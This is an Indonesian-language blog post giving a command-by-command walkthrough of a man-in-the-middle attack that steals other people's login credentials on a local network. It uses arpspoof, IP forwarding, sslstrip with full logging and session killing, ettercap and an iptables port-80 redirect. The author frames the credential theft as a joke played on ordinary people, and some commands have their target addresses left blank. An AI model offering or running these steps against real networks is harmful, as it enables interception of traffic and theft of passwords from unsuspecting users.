Beranda » Hacking » Hacking Sslstrip for Slackware (https,http)

Hacking Sslstrip for Slackware (https,http)

Start here


mencuri username dan pass org.biasa ngerjain org sambil minum kopi (annyamanna karaeng) kwkwkkw
to the point aja the

root@user-laptop:~# kwrite /etc/etter.conf

# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”

hapus tanda pagarnya ya mas…

root@user-laptop:~# arpspoof
Version: 2.4
Usage: arpspoof [-i interface] [-t target] host

root@user-laptop:~# arpspoof -i wlan0 -t

kemudian isi pada

root@user-laptop:~# /proc/sys/net/ipv4/ip_forward

cara untuk mengisi or mengaktikan ip_forward

root@user-laptop:~# echo 0 > /proc/sys/net/ipv4/ip_forward [angka 0 berarti blom aktif]
root@user-laptop:~# echo 1 > /proc/sys/net/ipv4/ip_forward [angka 1 berarti udah aktif]

root@user-laptop:~# cat /proc/sys/net/ipv4/ip_forward [melihat isi dari ip_forward]

melihat host pada jaringan

root@user-laptop:~# tracert
traceroute to (, 30 hops max, 40 byte packets
1 ( 1.250 ms 2.134 ms 2.460 ms
2 ( 5.653 ms 5.803 ms 6.082 ms

langkah selanjutnya

aktikan sslstrip

root@user-laptop:~# sslstrip –help

sslstrip 0.1 by Moxie Marlinspike
Usage: sslstrip

-w , –write= Specify file to log to (optional).
-p , –post Log only SSL POSTs. (default)
-s , –ssl Log all SSL traffic to and from server.
-a , –all Log all SSL and HTTP traffic to and from server.
-l , –listen= Port to listen on (default 10000).
-f , –favicon Substitute a lock favicon on secure requests.
-k , –killsessions Kill sessions in progress.
-h Print this help message.

root@user-laptop:~# sslstrip -a -k -f

aktifkan ettercap

root@user-laptop:~# ettercap –help

-T, –text use text only GUI
-q, –quiet do not display packet contents
-i, –iface use this network interface


root@user-laptop:~# ettercap -T -q -i wlan0

jalankan iptable yang anda pernah edit di kwrite kwrite /etc/etter.conf

root@user-laptop:~# iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 10000

good luck..
[+] Author : vim-n4n0


Tinggalkan Balasan

Please log in using one of these methods to post your comment:


You are commenting using your account. Logout /  Ubah )

Foto Google+

You are commenting using your Google+ account. Logout /  Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout /  Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout /  Ubah )


Connecting to %s